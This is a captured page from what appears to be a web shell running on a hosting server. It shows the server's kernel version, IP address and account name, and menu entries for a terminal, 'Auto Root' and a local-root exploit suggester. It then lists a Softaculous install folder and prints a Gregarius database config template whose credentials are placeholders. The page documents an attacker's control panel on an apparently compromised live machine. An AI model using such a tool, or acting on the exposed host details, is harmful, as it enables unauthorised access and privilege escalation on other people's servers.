Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.154
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
greg /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-07-04 10:27
php53
[ DIR ]
drwxr-xr-x
2017-07-04 10:27
php56
[ DIR ]
drwxr-xr-x
2017-07-04 10:27
clone.php
3.71
KB
-rw-r--r--
2017-01-04 07:45
dbinit.php
1.42
KB
-rw-r--r--
2011-03-11 09:52
edit.php
4.87
KB
-rw-r--r--
2017-01-04 07:45
edit.xml
433
B
-rw-r--r--
2016-08-10 07:43
fileindex.php
297
B
-rw-r--r--
2012-02-22 08:50
import.php
3.33
KB
-rw-r--r--
2017-01-04 07:45
info.xml
1.55
KB
-rw-r--r--
2017-01-04 05:14
install.js
921
B
-rw-r--r--
2013-05-31 07:45
install.php
3.55
KB
-rw-r--r--
2017-01-04 07:45
install.xml
642
B
-rw-r--r--
2011-03-11 09:52
md5
4.07
KB
-rw-r--r--
2017-01-04 07:45
Save
Rename
<?php // // The type of database server you are using. By default // Gregarius will look for a MySQL database server. If you // would like to use an SQLite database, change accordingly // define ('DBTYPE','mysql'); // // The name of your database // define ('DBNAME','[[softdb]]'); // // The username to use when connecting to the database. Make sure that // thus user owns privileges to CREATE database tables on the above // database! // define ('DBUNAME','[[softdbuser]]'); // // The password to use when connecting to the database // define ('DBPASS', '[[softdbpass]]'); // // If you are using a MySQL database: // The hostname of your database server. Unless you know // different this should probably be 'localhost' or '127.0.0.1' // // If you are using a SQLite database: // This constant must contain the full path to your database file, // for example: '/tmp/gregarius.db' // Note that the apache process must have write access privileges // on the given directory! // define ('DBSERVER', '[[softdbhost]]'); // // The table name prefix to use. If you specify anything here, // say 'gregarius', your database table 'channels' will be referred to // as 'gregarius_channels'. This is useful to avoid table collisions when // your hosting provider only grants you one single database and several // applications rely on that db. // // If this is not the case you can safely ignore this option. // define('DB_TABLE_PREFIX', '[[dbprefix]]'); ?>